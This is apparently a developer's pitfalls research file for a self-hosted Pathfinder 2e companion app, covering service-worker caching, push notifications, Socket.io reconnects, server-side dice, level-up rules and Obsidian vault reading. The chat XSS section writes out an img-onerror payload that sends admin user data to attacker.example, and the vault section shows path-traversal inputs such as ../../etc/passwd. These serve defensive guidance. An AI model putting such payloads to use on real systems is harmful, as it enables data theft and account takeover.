Files
Dimension-47/.planning/research/PITFALLS.md

56 KiB
Raw Blame History

Pitfalls Research

Domain: Self-hosted PF2e TTRPG companion app — PWA + multi-screen battle + extended Socket.io + Obsidian read-only vault + full PF2e Level-Up Researched: 2026-04-27 Confidence: HIGH for PWA/Push/Socket.io/Prisma areas (verified via official sources and 2026 docs); HIGH for PF2e rules (verified against Archives of Nethys); MEDIUM for Obsidian-specific markdown traps (community wisdom + forum threads)

This document is opinionated. Pitfalls are grouped by the six active phase buckets (Level-Up, PWA, Battle-Multi-Screen, Dice/Chat, GM-Live-Tools, Obsidian) plus cross-cutting categories (Prisma/Postgres, Socket.io, Mobile-at-the-Table). Each pitfall lists warning signs, prevention, and the phase that owns it.


Critical Pitfalls

Pitfall 1: Service Worker caches an authenticated API response and serves it to the wrong user after logout/re-login

What goes wrong: The service worker caches a /api/characters/:id response as part of an offline-read strategy. User A logs out, user B logs in on the same device (shared GM laptop, same browser profile). User B opens the cached character page and sees user A's character — or worse, user A's JWT-derived data — because the cache key is the URL, not the user identity.

Why it happens: Service worker fetch-handlers cache by request URL by default. They don't know about JWT context. The browser also keeps the service worker alive across login/logout because logout only clears storage, not caches.

How to avoid:

  • Cache only non-sensitive static assets (JS/CSS/icons/manifest) with a network-first or cache-first strategy
  • For authenticated API responses, use IndexedDB keyed by userId (not the SW Cache API), and clear it on logout
  • On logout: explicitly call caches.delete() for any user-scoped cache name AND swReg.unregister() is overkill but messaging postMessage("LOGOUT") to the SW lets it purge user data
  • Treat any URL containing /api/characters/, /api/campaigns/, /api/battle/ as never cache by URL alone — always wrap in a user-scoped key

Warning signs:

  • A second logged-in user reports seeing data they shouldn't
  • DevTools → Application → Cache Storage shows entries with sensitive paths after logout
  • Multi-user shared device shows stale data

Phase to address: PWA (the offline-read story has to be designed user-scoped from day one)


Pitfall 2: Service Worker + Socket.io mid-game force-update interrupts an active battle session

What goes wrong: A new SW version deploys mid-session. Default Workbox behavior (skipWaiting() + clients.claim()) reloads tabs, killing the open Socket.io connection on the GM laptop and the table display. Initiative state is in-memory on the client; reconnecting after a forced reload causes flicker, dropped events, or — worst case — the GM has to re-drag tokens because the WebSocket replay didn't catch the missed events.

Why it happens: Devs follow tutorials that recommend skipWaiting() for "instant updates" without considering that some apps (this one) absolutely cannot reload mid-task. Service workers in 2026 still have long default update cycles (24h check) but skipWaiting() short-circuits that to immediate.

How to avoid:

  • NEVER call skipWaiting() automatically. Wait for user action.
  • Show a non-blocking "Neue Version verfügbar — jetzt aktualisieren?" toast/banner. Only reload when the user clicks.
  • During an active battle session, suppress the update prompt entirely until the session is closed. Track active-battle state in a Zustand store; gate the toast on !isInBattle.
  • Use Workbox's ServiceWorkerRegistration.waiting + controllerchange event for the manual flow.
  • Tag SW versions with git SHA so you can correlate "stuck on old version" reports with deploy times.

Warning signs:

  • Players report "it reloaded in the middle of a fight"
  • Multiple SW versions reported in chrome://serviceworker-internals for active users
  • Token positions desync between GM laptop and table display after deploy

Phase to address: PWA (must be designed before the first SW ships — retrofitting "don't update during battle" is hard)


Pitfall 3: iOS Safari PWA push notifications silently fail because the install path or manifest is wrong

What goes wrong: GM sends a "Würfelaufforderung" push to all players. Android players get it. iOS players get nothing. No error, no log entry, just silence. Investigation reveals one of: app wasn't installed via "Add to Home Screen", manifest didn't have "display": "standalone", app was opened from Safari tab not home-screen icon, OR the user is in the EU where iOS PWAs behave differently (Apple has shipped EU-region restrictions).

Why it happens: iOS 16.4+ supports Web Push, but only for PWAs installed to the home screen running in standalone mode. Permission prompts must be triggered by direct user gesture. The manifest requirements are stricter than on Android. EU regulatory changes have caused iOS PWA push to be flaky depending on Safari version and region.

How to avoid:

  • Manifest must include: "display": "standalone", name, short_name, start_url, full icon set including 192x192 and 512x512, maskable icon variant for Android
  • Add an in-app "Install Guide" page targeted at iOS: detect navigator.standalone === false && /iPhone|iPad/.test(navigator.userAgent) and show explicit instructions ("Teilen-Button → Zum Home-Bildschirm")
  • Permission prompt: show only after user taps a deliberate "Benachrichtigungen aktivieren" button — never on first load
  • After permission grant, immediately do a self-test: send a test push from server and confirm receipt in client. If silent, surface a clear error.
  • Document the EU caveat in user-facing help: PWAs in EU may not get push depending on iOS version; recommend Android Chrome or non-EU iOS
  • HTTPS is mandatory — even self-hosted dev needs a valid cert (use mkcert or Let's Encrypt + reverse proxy)

Warning signs:

  • "I didn't get the ping" from one platform but not others
  • Permission shows "denied" or "default" forever after a failed first attempt
  • pushManager.getSubscription() returns null after permission grant

Phase to address: PWA


Pitfall 4: VAPID key gets lost or rotated → all existing push subscriptions silently break

What goes wrong: Server is rebuilt, .env is regenerated, VAPID keys are different. All PushSubscription rows in the DB now point to the old public key. Push sends fail with 401/403, but the player-facing app shows the user as "subscribed". Users wonder why pings stopped working. There is no UI signal because subscriptions appear valid client-side.

Why it happens: VAPID keys are application-server-identity keys. web-push libraries don't refuse to send with mismatched keys until the push service rejects. Devs treat .env as ephemeral and lose the keypair.

How to avoid:

  • VAPID keys are application secrets — back them up like JWT_SECRET. Document explicitly in .env.example that these must be persistent across deploys.
  • Generate them once during initial setup, commit the public key to a build-time constant (or fetch from a stable endpoint), keep the private key server-side only
  • Implement automatic 410-Gone cleanup: on push send, if the push service returns 410, delete that PushSubscription row. Without this, expired subs accumulate and waste send budget.
  • Listen to the pushsubscriptionchange event in the service worker — when the browser rotates a subscription, re-register with the server
  • On startup, log VAPID public key fingerprint so you notice if it changes unexpectedly
  • Never rotate VAPID keys without a migration plan — rotation invalidates every existing subscription and there's no resubscribe-without-permission path

Warning signs:

  • "Push works but not for older users"
  • 401/403 spike in push send logs
  • PushSubscription row count growing forever (no cleanup)
  • Random subscription fails after browser updates

Phase to address: PWA / GM-Live-Tools


Pitfall 5: Display-mode (table screen) leaks GM-only data because role-checks live in components, not in the data layer

What goes wrong: The display screen reuses the BattleScreen React component with a displayMode prop. The component conditionally hides GM controls. But the WebSocket payload still contains npcStats.hidden = true, nextRoundEnemyAction = "uses healing potion at 30%", GM notes on tokens, hidden token positions (invisible enemies), or full HP values for monsters whose HP should appear as a vague bar. A curious player could open DevTools at the table, look at the WebSocket frames, and see everything.

Why it happens: "It's just a display screen, players can't interact" — but the display screen is on the same network, served by the same socket.io server, often connected with the GM's account or a shared anonymous account. The data filtering happens in render, not in the gateway emit.

How to avoid:

  • Treat the display screen as an untrusted client even though physically it's at the table
  • Server-side: emit two distinct event channels, battle:gm:* and battle:display:*, with the display channel containing only what's safe to show (token positions, public HP bars, initiative order, public conditions)
  • Authenticate the display screen with a separate display-only token issued by the GM (short-lived, scoped to one battle, can't access other endpoints)
  • Display-screen routes server-side must reject attempts to read GM-only fields even with a valid token
  • Add a "Display token" UI: GM clicks "Display starten" → server issues a one-shot token + URL with embedded token → display screen opens that URL → token expires when battle ends
  • Test: open the display URL in incognito, run socket.on("*", console.log), verify no GM data appears in any frame

Warning signs:

  • Display screen URL works after copy-paste from another browser
  • WebSocket frames sent to display include fields the player UI also doesn't render
  • Display screen survives GM logout

Phase to address: Battle-Multi-Screen


Pitfall 6: Client-side dice rolls are tampered/spoofed — players can claim any result

What goes wrong: Player rolls 1d20+7 for a critical save. Client computes the result, emits dice:roll {result: 20, total: 27} over WebSocket. Server broadcasts to chat. Either: (a) a player modifies the JS to always return 20, or (b) a player intercepts the WebSocket frame and edits the value. There's no way to detect cheating after the fact.

Why it happens: Convenience: it's easier to roll on the client and broadcast the result. PF2e crits (rolls of 20 OR results 10+ over DC) and persistent damage rolls feel "natural" to compute locally. Devs forget WebSocket payload is fully attacker-controlled.

How to avoid:

  • All rolls happen server-side. Client emits dice:request {notation: "1d20+7", purpose: "save"}. Server parses, rolls (using crypto.randomInt), persists to RollLog, broadcasts result.
  • Use a tested PF2e-aware notation parser. Required features:
    • Critical hits (PF2e: nat 20 OR meets-or-exceeds DC by 10 → crit; nat 1 OR misses by 10 → critical fail)
    • Crit doubles dice, NOT modifiers2d6+4 crits to 4d6+4, not 4d6+8. This is a frequent bug in generic parsers.
    • Persistent damage (2d6 persistent fire → recurring roll on each turn-end with DC 15 flat-check to remove)
    • Recharge dice for some abilities
    • keep highest, keep lowest, advantage/disadvantage (rare in PF2e but used by some feats)
  • Server stores roll seed + notation + result + roller + timestamp → fully auditable
  • Client-side has a shadow roller for instant feedback while waiting for server roll, but the server result is canonical and replaces the shadow on receipt

Warning signs:

  • Suspiciously high crit rate from one player
  • Roll log shows results that don't match notation
  • Players asking to "edit" their roll

Phase to address: Dice/Chat


Pitfall 7: Markdown chat messages enable XSS via raw HTML or javascript: URLs

What goes wrong: Chat supports markdown for formatting (bold, italics, links to roll results). A malicious or compromised player sends <img src=x onerror="fetch('/api/admin/users', {credentials:'include'}).then(r=>r.json()).then(d=>fetch('https://attacker.example/'+btoa(JSON.stringify(d))))">. The GM (admin) renders the message and runs the script in their session, leaking user data. Or a [click](javascript:...) markdown link that fires on click.

Why it happens: Devs use dangerouslySetInnerHTML with marked/markdown-it because it's easy. Or they use react-markdown but enable rehype-raw without rehype-sanitize because they want HTML inside markdown. Or they don't filter the URL protocols on links.

How to avoid:

  • Use react-markdown without rehype-raw for chat. Markdown → React elements directly, no dangerouslySetInnerHTML, no raw HTML.
  • Restrict allowed elements: allowedElements={['p','strong','em','code','pre','a','ul','ol','li','blockquote']}. No img, no iframe, no script, no style.
  • urlTransform to enforce protocol whitelist: only allow http:, https:, and internal route paths. Block javascript:, data:, vbscript:.
  • Server-side: validate message length (max ~2000 chars), strip control characters, refuse messages with HTML tags before storage. Defense in depth.
  • For roll embeds in chat (the killer feature), use a custom React component slot, not raw HTML — [[roll:abc123]] token that the renderer expands into a <RollResult> component fetching from server state.

Warning signs:

  • Any use of dangerouslySetInnerHTML in chat code
  • rehype-raw in the markdown pipeline without rehype-sanitize
  • Allowing img or a target="_blank" without rel="noopener noreferrer"

Phase to address: Dice/Chat


Pitfall 8: PF2e Level-Up — boost rules at-18 cap silently break ability scores

What goes wrong: Character has STR 18 at level 4. At level 5, four boosts must be allocated to four different attributes. UI lets player apply a boost to STR. Code adds +2 (because that's the standard boost) → STR 20. Wrong. Per the rules, a boost on a stat already 18 or higher adds only +1, not +2. The character's whole sheet is now overpowered. If the bug goes unnoticed for several levels, recomputing is expensive (every save/skill/AC was wrong from then on).

Why it happens: "Boost = +2" is the simple version. The +1 above 18 rule is easy to miss. Pathbuilder handles it, so devs comparing in-app to Pathbuilder don't notice for a while.

How to avoid:

  • Centralize the boost computation in a applyAttributeBoost(currentValue): number function. Single source of truth: currentValue >= 18 ? +1 : +2. Test it.
  • Validate boosts as a set, not individually. A "level 5 boost set" must apply to four different attributes. UI should grey out already-boosted attributes.
  • For each level-up, persist the decision (which 4 attributes) AND the resulting value, not just the value. Lets you replay/audit.
  • Edge cases to test:
    • All four boosts applied to attributes already at 18 → all +1
    • One boost applied twice in same set (forbidden — must be different attributes)
    • Free Archetype variant rule (no extra boosts, but interacts with feats)
    • Pathbuilder import of an already-leveled character: trust their values for prior levels, only validate from current level forward

Warning signs:

  • Character sheet shows attribute > 18 at level 5 without the +1 cap
  • Boost UI lets you click STR twice in same boost set
  • Differs from Pathbuilder result for the same character

Phase to address: Level-Up


Pitfall 9: PF2e Level-Up — recompute side effects (HP cap, AC, saves) corrupt current state

What goes wrong: Character is at HP 12/40 (badly wounded). Player levels up: CON boost increases HP-Max from 40 → 50. App correctly updates hp.max = 50 but also bumps hp.current = 50 ("you healed!"). Or: app sets hp.current = min(hp.current, hp.max) → still 12, fine — but in the inverse case, a CON DECREASE due to retrain would silently drop current HP below 0.

Worse: proficiency increase from Trained → Expert at level 3 changes save bonuses. App recomputes the +N modifier but doesn't apply it to the in-flight damageReceived calculation if combat is active.

Why it happens: Level-up touches HP, AC, saves, perception, skills, attacks. Every one of those has a "current" value and a "max/computed" value. Devs change the formula without thinking through the cap/floor invariants.

How to avoid:

  • Level-up commits in a Prisma transaction. All recomputed fields written atomically.
  • HP rule: on HP-Max increase, current does NOT change (player gets new room to heal). On HP-Max decrease (rare, undo case), current is min(current, newMax). Document this rule in code.
  • Level-up CANNOT happen during an active battle session — gate it. PF2e level-ups happen during downtime/rest, never mid-fight.
  • After commit, broadcast a single character:level-up:complete event with the full new sheet, not a sequence of small updates (avoids inconsistent intermediate states broadcast to other clients).
  • Test scenario: character at 0 HP with Dying 2 levels up (edge case for raise-dead-then-level mid-session) — must not silently kill the character or remove Dying.

Warning signs:

  • HP fully refilled after level-up (should keep the player's current value)
  • Save modifiers don't update after proficiency increase
  • Conditions disappear after level-up

Phase to address: Level-Up


Pitfall 10: PF2e Level-Up — undo/retrain creates orphaned feat dependencies

What goes wrong: Player retrains a level-2 class feat (per the retraining rules). The retired feat was a prerequisite for a level-6 feat the player still has. The level-6 feat now violates its prereq but stays on the sheet. Or: archetype dedication retrained, but the player still has 2 archetype feats pointing to that archetype, in violation of the "must take 2 feats from archetype before another dedication" rule.

Why it happens: Feats are stored as a flat list. Prerequisites are checked at acquisition time, not as an invariant. Removing a feat doesn't trigger re-validation of dependent feats.

How to avoid:

  • Model feats with explicit prerequisites: FeatId[] graph
  • On any feat removal (retrain, undo level-up, archetype change), run a transitive-closure check: any remaining feat whose prereqs are now unmet must be flagged
  • Don't auto-remove dependent feats — surface a "Diese Talente verlieren ihre Voraussetzung" warning and force the player to choose: retrain those too, or block the retrain
  • Archetype invariants:
    • Cannot take a 2nd archetype dedication until 2 non-dedication feats from the 1st archetype are taken
    • With Free Archetype variant, dedication taken at level 1 may have no valid feat at level 2 (all archetype feats are usually level 4+) — surface this as a known gap, allow temporary placeholder
    • Must be prevented: dedication-spam (taking 4 dedications in a row, breaking RAW)
  • Persist level-up history as an append-only log so undo means "create an inverse entry", not destructive update

Warning signs:

  • Character has feats whose prereq feat is missing
  • Two archetype dedications without 2 feats from the first archetype between them
  • Undo of level-N corrupts data at level-(N+1)

Phase to address: Level-Up


Pitfall 11: PF2e Level-Up — skill increase tracking forgets which skills were already increased at which level

What goes wrong: Player has Trained in Athletics at level 1, increases to Expert at level 3, Master at level 7, Legendary at level 15. App stores athletics.proficiency = "legendary" only. At level 20, player wants to undo the level-15 increase. App doesn't know which skill was the level-15 choice — has to guess or block all undo.

Why it happens: Final value is what's displayed on the sheet, so devs only persist the final value. The history of increases is implicit ("must have been at level 15 because legendary") which fails when multiple skills are at the same rank.

How to avoid:

  • Persist SkillIncreaseHistory as (characterId, skillId, level, fromRank, toRank) rows
  • On any skill query, current rank = sum of increases up to current level
  • This also makes the rank-gates trivial to enforce: at levels 3-6, only Trained→Expert. At 7+, also Expert→Master. At 15+, also Master→Legendary.
  • Pathbuilder import: synthesize history rows when possible (Pathbuilder export contains ranks per level), otherwise create one row per current rank with level = currentLevel (lossy but at least consistent)

Warning signs:

  • Level-up UI lets player increase a skill they already increased this level
  • Undo of level-N skill increase requires guessing which skill
  • Imported character has different ranks than Pathbuilder

Phase to address: Level-Up


What goes wrong: Vault has Characters/Aldrin.md and NPCs/Aldrin.md. A note links [[Aldrin]]. App's resolver picks the first match (alphabetical, by depth, or by a path heuristic). Sometimes it picks Characters/Aldrin, sometimes NPCs/Aldrin, depending on file order returned by the filesystem. Player following the link gets the wrong character page. Indexing performance also varies.

Why it happens: Obsidian uses a "shortest path that's still unique" rule. When multiple notes have the same basename, the rule does NOT pick the first match — it falls back to absolute path. Naive resolvers don't replicate this.

How to avoid:

  • Implement Obsidian's resolution algorithm faithfully:
    1. Exact match on the link text ([[Folder/Name]]) → resolve to that path
    2. Otherwise, basename match: if exactly one file in the vault has that basename, use it
    3. If multiple files share the basename, the link is ambiguous → either error out, render as [[Aldrin (mehrdeutig)]] with a tooltip listing matches, or use the link's containing-folder context
  • Build a basename index at vault-load time: Map<basename, fullPath[]>. Detect ambiguity in O(1).
  • Cache the index, invalidate when the vault changes (mtime check or webhook from the vault server)
  • Surface ambiguity to the user — a vault read-only browser that silently picks wrong is worse than one that says "ambiguous, choose one"
  • Don't follow Obsidian's "shortest path possible" link-creation default unless you also implement its conflict UI; pick a deterministic tie-breaker (alphabetical full path) and document it

Warning signs:

  • Same wikilink resolves differently on different vault reads
  • Two notes with the same basename and link target unclear
  • Performance regression in resolver as vault grows

Phase to address: Obsidian


Pitfall 13: Obsidian embed loops cause stack overflow / infinite render

What goes wrong: A.md contains ![[B]] (embed B). B.md contains ![[A]]. Naive recursive renderer expands forever, eventually crashing the tab or hanging the server depending on where rendering happens.

Why it happens: Embeds are recursive by design. Devs implement them as straight recursion without cycle detection.

How to avoid:

  • Maintain a per-render Set<resolvedPath> of already-being-rendered notes. Before recursing into an embed, check if path is in the set. If yes, render [Eingebettete Note: {name} (Zyklus)] placeholder.
  • Hard cap embed depth at 3-4 levels even in non-cyclic cases (deeply nested embeds are user error)
  • Render server-side OR limit client-side embed expansion to one level (Obsidian itself doesn't recursively expand more than one level on first render)
  • Test with a known-cyclic vault before shipping

Warning signs:

  • Page hangs on certain notes
  • Server CPU spike on vault read of specific files
  • Stack overflow errors in renderer

Phase to address: Obsidian


Pitfall 14: Vault path traversal allows reading files outside the vault root

What goes wrong: Vault server endpoint accepts ?path=../../etc/passwd or ?path=Notes/../../../server.env. Naive path joining (vaultRoot + userInput) followed by fs.readFile reads any file the server process can access.

Why it happens: Server devs forget that wikilinks come from user-controlled markdown content, not just direct API calls. Even reading-only is dangerous if the read can target sensitive files.

How to avoid:

  • Resolve the requested path with path.resolve(vaultRoot, userPath)
  • Verify the resolved absolute path starts with vaultRoot + path.sep — reject otherwise
  • Refuse any path containing .., null bytes (%00), or symlinks pointing outside the vault
  • Whitelist file extensions: .md, .png, .jpg, .jpeg, .gif, .webp, .svg, .pdf. Reject everything else.
  • Authenticate the vault endpoint with the same JWT as the rest of the API
  • On Windows, also reject paths containing : or device names (CON, PRN, NUL, AUX, COM1-COM9, LPT1-LPT9) — can be used for device-name attacks

Warning signs:

  • Vault endpoint accepts arbitrary path strings without validation
  • Resolved path doesn't get normalized before access
  • Tests don't cover .., symlinks, or absolute paths

Phase to address: Obsidian


Pitfall 15: Socket.io message ordering breaks on reconnect; Connection State Recovery not enabled

What goes wrong: Player loses Wi-Fi for 5 seconds during battle. GM updates 3 token positions during that gap. On reconnect, player sees only the latest token position emitted after reconnect — the 3 missed updates are lost. Or worse, a chat message sent during the gap never arrives, and there's no indication of loss.

Why it happens: Default Socket.io reconnects but does NOT replay missed events unless Connection State Recovery (CSR) is explicitly enabled. Even with CSR, the recovery window is short (default 2 minutes) and the adapter must support it.

How to avoid:

  • Enable Connection State Recovery on the server: io({connectionStateRecovery: {maxDisconnectionDuration: 2 * 60 * 1000, skipMiddlewares: true}})
  • For events that must not be lost (chat messages, dice rolls, GM-pings), use the retries option on emit: socket.emit(event, payload, {retries: 3}) and require server ack
  • For state-sync events (HP, token position), don't worry about replay — instead, on reconnect, re-fetch the current state via REST and reconcile. WebSocket events are the live update channel; REST is the source of truth.
  • Persist chat and rolls to Postgres immediately on receipt, broadcast as a notification only. On reconnect, client refetches since=lastSeenId from REST.
  • Acknowledge important events: server emits chat:new with a callback; client invokes the callback to confirm receipt; server retries N times if no ack within timeout.

Warning signs:

  • "I missed the GM's message" reports
  • Token positions desync between clients
  • Chat history has gaps after a reconnect
  • No ack-tracking on critical events

Phase to address: Battle-Multi-Screen, Dice/Chat (cross-cutting WebSocket area)


Moderate Pitfalls

Pitfall 16: Cascading deletes wipe historical data unintentionally

What goes wrong: GM deletes an old battle session for cleanup. With onDelete: Cascade on BattleSession → RollLog, all roll history from that battle is gone. Players lose their historic crits. Or: campaign deletion cascades to characters, characters cascade to rolls — entire user history vanishes.

Why it happens: Devs default to Cascade because "clean up automatically". Don't think about which children are historical records vs transient state.

How to avoid:

  • Decide per-relation: is the child dependent state (token positions only meaningful inside their battle → Cascade) or historical record (rolls/chat are part of campaign history → Restrict or SetNull with archivedAt)?
  • Soft-delete (deletedAt: DateTime?) for top-level entities (Campaign, BattleSession) so accidents are recoverable
  • For PushSubscription: Cascade on User delete (no orphan subs)
  • For RollLog/ChatMessage: NoAction on User delete (preserve history; show "Spieler entfernt" instead of name); soft-delete the user
  • For BattleEffect: Cascade on token delete (effect is a property of the token)
  • Document each onDelete in a comment in schema.prisma

Warning signs:

  • Deleting a parent unexpectedly nukes lots of child rows
  • Migration introduces Cascade on a relation that previously had Restrict
  • No soft-delete on user-facing entities

Phase to address: All phases that add new tables (Level-Up: LevelUpSession; PWA: PushSubscription; Battle: BattleEffect; Dice/Chat: RollLog, ChatMessage)


Pitfall 17: Per-event JWT validation overloads the gateway

What goes wrong: Codebase already has characters.gateway.ts doing JWT verification on connect. As new events are added (dice:roll, chat:send, battle:effect:apply), devs add per-event auth checks that re-decode the JWT every time. CPU spikes during a busy combat round (10+ events/sec).

Why it happens: "Belt and suspenders" mindset. JWT verify is fast (microseconds) but at scale it accumulates.

How to avoid:

  • Validate JWT once on connect (already done). Store the userId on the socket: socket.data.userId
  • Per-event handlers read socket.data.userId — no re-decode
  • Authorization (does this user have rights to this action?) is per-event, but uses the cached userId — only DB lookups for role/membership, no JWT work
  • Add token-revocation table check ONLY on connect, not per event. Acceptable trade-off: revoked token stays valid until disconnect (~minutes to hours).
  • Implement a server-side "kick" admin action that disconnects sockets by userId for emergency revocation

Warning signs:

  • CPU spike during high-event-rate moments
  • Repeated JWT verify calls in profiler output
  • Adding new events requires copy-pasting auth code

Phase to address: Cross-cutting (Battle-Multi-Screen, Dice/Chat, GM-Live-Tools all add new events)


Pitfall 18: WebSocket room cleanup leaks on disconnect

What goes wrong: Existing connectedClients Map (already noted in CONCERNS.md) grows because disconnects don't always remove entries cleanly. Add Battle rooms, Roll-Log rooms, Chat rooms → multiple maps, multiple leak paths. Server memory grows monotonically.

Why it happens: Custom client tracking duplicates Socket.io's built-in room tracking. Disconnect handler forgets one of the maps.

How to avoid:

  • Remove the custom connectedClients Map. Use Socket.io rooms exclusively. Rooms auto-cleanup on disconnect.
  • For "is user X online" queries, use io.in(user:${userId}).fetchSockets() rather than a custom map
  • Single disconnect handler does all cleanup; never spread cleanup across feature modules
  • Add a periodic health check that logs io.sockets.sockets.size — alert if it grows unboundedly

Warning signs:

  • connectedClients.size > sockets.size (drift)
  • Memory usage trends up over multi-day sessions
  • "Phantom" online users

Phase to address: Battle-Multi-Screen (when adding battle rooms + display rooms)


Pitfall 19: Mobile device sleeps during session, missing push and breaking WebSocket

What goes wrong: Player puts phone face-down on table. Phone sleeps after 30s. WebSocket disconnects. GM sends "Würfel Reflex-Save" push. Phone is asleep — push wakes it briefly, notification appears in tray, but the app's WebSocket is still disconnected. Player taps notification, app opens, but the app shows stale state because the reconnect-and-refetch flow takes 3+ seconds.

Why it happens: Mobile OSes aggressively suspend background tabs and apps. WebSocket through a sleeping phone is dead. Push wakes the OS but not the app's network state.

How to avoid:

  • On visibilitychangevisible, immediately: check WebSocket connection state, reconnect if needed, refetch current campaign + battle state via REST
  • Show a clear "Verbinde wieder..." indicator during reconnect, hide all stale data behind it
  • Wake Lock API for active turn: when it's the player's turn, acquire a wake lock so screen stays on. Release when turn ends. Document battery impact.
  • Push payload includes an action field: notification tap deep-links to the relevant page (battle, dice prompt, chat) so reconnect happens at the right place
  • Service worker handles push by displaying the notification AND optionally updating an IndexedDB queue of pending actions, so when the app reopens, it knows what was pending

Warning signs:

  • "I tapped the push but the app is in the wrong place"
  • Stale data on app reopen
  • Battery drain (over-eager wake lock or polling)

Phase to address: PWA / Mobile-First polish


Pitfall 20: Reconnect storm when Wi-Fi at the table flaps

What goes wrong: Wi-Fi at the gaming table briefly drops (router hiccup, neighbor microwaving). All 5 player phones + GM laptop + table display all disconnect simultaneously. Wi-Fi recovers. All 7 clients try to reconnect at the same moment. With Socket.io's default backoff, they all hit the server within 1 second. Server is fine for 7 clients, but if the server is also doing CPU-heavy work (e.g., translation API, DB query), the spike causes a cascade of slow connects, ack timeouts, more retries.

Why it happens: Same network, same event → synchronized reconnects. No jitter in the backoff.

How to avoid:

  • Configure Socket.io client with randomized backoff: reconnectionDelay: 1000, reconnectionDelayMax: 5000, randomizationFactor: 0.5
  • Server: rate-limit connection attempts per IP (the existing concern in CONCERNS.md flags this — fix in this milestone since we're adding more event load)
  • Connection State Recovery cushions the impact: if the disconnect was < 2min, the recovered session reuses state, no full re-init needed
  • Separate "static asset" CDN/path from API path so SW can serve cached UI even when API is overloaded

Warning signs:

  • All clients lose connection at once and recovery is slow
  • Server logs show simultaneous connect bursts
  • Long "Verbinde..." spinner after a brief outage

Phase to address: Battle-Multi-Screen (where reconnect resilience matters most), Mobile/PWA


Minor Pitfalls

Pitfall 21: Manifest icon traps (maskable, sizes, splash)

What goes wrong: Android shows a white square inside the app icon (because non-maskable icon used in maskable slot). iOS doesn't show a splash screen (because no apple-touch-icon link tags or apple-touch-startup-image). PWA looks unprofessional or non-installable.

How to avoid:

  • Provide both "any" and "maskable" icon variants. Maskable icons must have safe-zone padding (icon content within 80% diameter circle).
  • Sizes required: 192x192, 512x512, plus apple-touch-icon 180x180
  • iOS splash screens are device-specific; use a generator or a single-image fallback
  • Test on real iOS Safari + Android Chrome before claiming "PWA-ready"

Phase to address: PWA


Pitfall 22: Chat/roll history queries are not indexed for time-paginated reads

What goes wrong: SELECT * FROM ChatMessage WHERE campaignId = X ORDER BY createdAt DESC LIMIT 50 is fast at 1k messages, slow at 100k. Server hot-path during scrollback.

How to avoid:

  • Composite index @@index([campaignId, createdAt(sort: Desc)]) on ChatMessage and RollLog from day one
  • Use cursor-based pagination (WHERE createdAt < cursor ORDER BY createdAt DESC LIMIT 50) not offset-based
  • Optionally archive messages older than 1 year to a separate table (premature for this scale)

Phase to address: Dice/Chat


Pitfall 23: "Offline" PWA shows login screen because auth check fails offline

What goes wrong: Player opens app on the train (no Wi-Fi). PWA loads (cached shell), but the auth check (GET /api/auth/me) fails → app redirects to login → login API call also fails → user sees broken login screen and assumes app is dead.

How to avoid:

  • App-shell loads UI optimistically using cached JWT validity (decode locally, check exp)
  • Network errors on auth-check are NOT treated as "logged out" — they're "offline, using last-known identity"
  • Distinct error states: "Nicht eingeloggt" vs "Offline — gecachte Daten verfügbar"
  • Login form shows "Offline" banner if API unreachable, doesn't try to log in

Phase to address: PWA


Pitfall 24: Display screen aspect ratio mismatch on the table-embedded screen

What goes wrong: Built and tested on 16:9 laptop. Tabletop screen is some weird embedded panel (maybe 4:3, maybe portrait). Map is cropped or pillarboxed badly. Tokens look wrong.

How to avoid:

  • Display mode uses meta viewport to lock to actual screen pixels
  • Map renders to a fit-to-window container with letterboxing background, not absolute pixels
  • Detect aspect ratio at load and adjust default zoom; provide GM control to "frame to display"
  • Get the actual screen specs from the user before shipping

Phase to address: Battle-Multi-Screen


Pitfall 25: GM-tool safety — accidental "set HP to 0 for all party"

What goes wrong: GM has bulk-control tools ("apply Frightened to all enemies"). Slips and clicks "all party" instead of "all enemies". Whole party drops to 0 HP, conditions piled on. Without confirmation, undoable change is a disaster mid-fight.

How to avoid:

  • Destructive bulk actions require confirmation modal naming the affected entities
  • All GM-live-tool actions are in a transaction that emits a single broadcast — recoverable by the ctrl-Z action that undoes the transaction
  • Keep an in-memory "last action" stack (last 5 actions) on GM client with one-click undo
  • High-impact actions (set HP to 0, kill, end battle) require a typed confirmation ("ALLE TÖTEN" must be typed)

Phase to address: GM-Live-Tools


Technical Debt Patterns

Shortcut Immediate Benefit Long-term Cost When Acceptable
Client-side dice rolls Instant feedback, no server roundtrip Cheating possible, no audit, no replay Never for canonical rolls — OK as preview/shadow only
dangerouslySetInnerHTML for chat markdown Easy to render, all features work XSS, account takeover via chat Never
Cache API for authenticated responses Simple offline support User-data leak across logins Never — use IndexedDB user-scoped
skipWaiting() + clients.claim() in SW Instant updates Mid-session reload kills state Never in this app
Storing final ability score only (no boost history) Simpler model Can't undo level-ups, can't audit Never — store boost decisions
Custom connectedClients Map "Easy" presence tracking Memory leaks, drift Never — use io.in(room).fetchSockets()
db push instead of prisma migrate dev Skips writing migration Lost migration history, prod drift Never (already enforced by CLAUDE.md)
any types for level-up wizard state Move fast through prototyping Bugs in branching wizards are silent Only for spike branches that get rewritten
Reading vault files with raw user paths Simple impl Path traversal Never
Single RollLog table without index Works at small scale Slow scrollback at 50k+ rolls Acceptable until index strategy decided in same phase

Integration Gotchas

Integration Common Mistake Correct Approach
Web Push / VAPID Regenerate VAPID keys on every deploy Persist keys in .env, treat as secret, document in .env.example
Service Worker + Socket.io Try to handle WebSocket inside SW SW is for static cache + push only; WebSocket lives in the page, reconnects on visibility
iOS PWA Push Test only in Safari tab, not installed PWA iOS push requires home-screen install + standalone display mode
Obsidian vault sync Read directly from filesystem during edit Vault contents may change mid-read; use a stable snapshot (git ref or mtime guard)
Pathbuilder import → in-app level-up Treat imported character as authoritative for all levels then layer level-ups Snapshot the import as level N, persist explicit level-up decisions only for level N+1 onward
Claude API (existing) for new content (level-up flavor text) Add to critical path Cache aggressively, never block UI on translation, fallback to English
Postgres + Prisma 7 Default Restrict on relations causes mysterious failures on parent delete Decide explicit onDelete per relation, document in schema comment

Performance Traps

Trap Symptoms Prevention When It Breaks
Unbounded RollLog query without index Chat scrollback slows over weeks Composite index on (campaignId, createdAt DESC); cursor pagination ~50k rolls per campaign
Recursive embed render without depth cap Some vault notes hang the page Cycle detection + max depth 3 One cyclic note in vault
Per-event JWT verify Server CPU spike during combat rounds Decode once on connect, cache userId on socket ~20 events/sec sustained
Broadcast every token nudge Network thrash, mobile battery drain Debounce drag events (60ms), emit final position only on drop Continuous drag at 60fps × N players
All clients reconnect at once after Wi-Fi flap Server connect-burst lag Randomized backoff, rate limit Network flap with 5+ clients
